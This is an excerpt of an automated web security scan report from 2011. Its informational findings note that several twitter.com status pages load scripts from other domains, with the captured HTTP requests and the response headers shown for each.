Last-Modified: Fri, 28 Jan 2011 14:31:44 GMT
X-Runtime: 0.03425
Content-Type: text/html; charset=utf-8
Content-Length: 13787
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8zMDEwMzU5NDkyNTU1NTcxMjoMY3NyZl9pZCIlMWFjMzU3YWRiNjMy%250AMTkxYTFiOTVmZjIxOWM2MWFjMDY6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--10e0f422c0565fd54016e2668bf0dc12c3549708; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.486. http://twitter.com/malsup/status/30103594925555712

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /malsup/status/30103594925555712

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /malsup/status/30103594925555712 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:25:44 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224744-39713-23366
ETag: "7bb96996c6739d3b30a2757944a67cce"
Last-Modified: Fri, 28 Jan 2011 14:25:44 GMT
X-Runtime: 0.05847
Content-Type: text/html; charset=utf-8
Content-Length: 13787
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8zMDEwMzU5NDkyNTU1NTcxMjoMY3NyZl9pZCIlZGQ5ZmU5ZmYzMGNm%250AMjhiMDY0MzgzM2U2NGNjMzJlMDY6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--176b58f6205e5a5aa6ed8ffb4443a86e18553832; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
...[SNIP]...

18.487. http://twitter.com/malsup/status/30232367046074369

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /malsup/status/30232367046074369

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /malsup/status/30232367046074369 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:06:40 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234400-48992-50295
ETag: "9486b3a58f9159bf530c7065952ec746"
Last-Modified: Fri, 28 Jan 2011 17:06:40 GMT
X-Runtime: 0.04718
Content-Type: text/html; charset=utf-8
Content-Length: 13553
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7DDoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8zMDIzMjM2NzA0NjA3NDM2OToVaW5fbmV3X3VzZXJfZmxvdzA6DGNz%250AcmZfaWQiJWFiYzQ1NWM5YjQ1NWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9u%250AYW1lIhRDZW50cmFsIEFtZXJpY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--cd5eee6cb518814e2c3a4b98f170590e4598280c; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.488. http://twitter.com/malsup/status/30232367046074369

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /malsup/status/30232367046074369

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /malsup/status/30232367046074369 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:25:42 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224742-9041-16904
ETag: "d3e65130366342526ec8ade660cf3dbb"
Last-Modified: Fri, 28 Jan 2011 14:25:42 GMT
X-Runtime: 0.04768
Content-Type: text/html; charset=utf-8
Content-Length: 13683
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8zMDIzMjM2NzA0NjA3NDM2OToMY3NyZl9pZCIlYTM3MGRmOTZhODQz%250AM2RiNDBlMmY1M2I5OTM2NjFmYjE6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--e05cd9620525d156ee51f67a18a4e6ea60c33e75; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.489. http://twitter.com/malsup/status/30417132269346816

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /malsup/status/30417132269346816

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /malsup/status/30417132269346816 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:25:42 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224742-7004-30272
ETag: "da9e6ffc8f0c311694071739765bd753"
Last-Modified: Fri, 28 Jan 2011 14:25:42 GMT
X-Runtime: 0.04299
Content-Type: text/html; charset=utf-8
Content-Length: 13699
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8zMDQxNzEzMjI2OTM0NjgxNjoMY3NyZl9pZCIlYzFhNDVhNDY0ZjBj%250ANTkyYTUyYTU1YjI1ZjJjN2VmZDg6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--1619ced3ca9bc9fa08b4a84d7d647b1b47a62ad4; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.490. http://twitter.com/malsup/status/30417132269346816

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /malsup/status/30417132269346816

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /malsup/status/30417132269346816 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:41 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225101-41543-21577
ETag: "7b3eddf287ab880dd7a3113b68b2ae49"
Last-Modified: Fri, 28 Jan 2011 14:31:41 GMT
X-Runtime: 0.05135
Content-Type: text/html; charset=utf-8
Content-Length: 13700
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8zMDQxNzEzMjI2OTM0NjgxNjoMY3NyZl9pZCIlMzIxYmVmNDFhZTU5%250AMGY0MTQ1YTRkZTNiYmE4OGQ2ODk6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lk%250AIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzon%250AQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7%250AAA%253D%253D--1ddcef71856cb3184cfbcaf3f2798f69a1792a8a; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.491. http://twitter.com/malsup/status/30418291201679360

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /malsup/status/30418291201679360

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /malsup/status/30418291201679360 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:25:40 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224740-43275-1259
ETag: "b36130e1f840ffcb8130031180af8a87"
Last-Modified: Fri, 28 Jan 2011 14:25:40 GMT
X-Runtime: 0.07149
Content-Type: text/html; charset=utf-8
Content-Length: 13636
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8zMDQxODI5MTIwMTY3OTM2MDoMY3NyZl9pZCIlNjZjMzQ2MThjNmJl%250ANjFjN2ZmMzBjNjgyMTNiYzQ1N2Q6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--be54aaa7f049891a1ab52a41024afae2053a60f4; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.492. http://twitter.com/malsup/status/30418291201679360

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /malsup/status/30418291201679360

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /malsup/status/30418291201679360 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:40 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225100-52222-37669
ETag: "0fa32a91d15f92fcebba9baa0646a0c0"
Last-Modified: Fri, 28 Jan 2011 14:31:40 GMT
X-Runtime: 0.05194
Content-Type: text/html; charset=utf-8
Content-Length: 13637
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8zMDQxODI5MTIwMTY3OTM2MDoMY3NyZl9pZCIlMTg0OWQwOTc5ODU4%250AZmRkOWExNmFhYTc3MTMyNzg4M2U6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lk%250AIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzon%250AQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7%250AAA%253D%253D--776398d5267902388309984475063a2748d72923; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.493. http://twitter.com/malsup/status/30442842241376256

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /malsup/status/30442842241376256

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /malsup/status/30442842241376256 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:25:40 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224740-54021-29414
ETag: "c768dc702745a41fcbc487b93ba7b1d0"
Last-Modified: Fri, 28 Jan 2011 14:25:40 GMT
X-Runtime: 0.05060
Content-Type: text/html; charset=utf-8
Content-Length: 13590
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
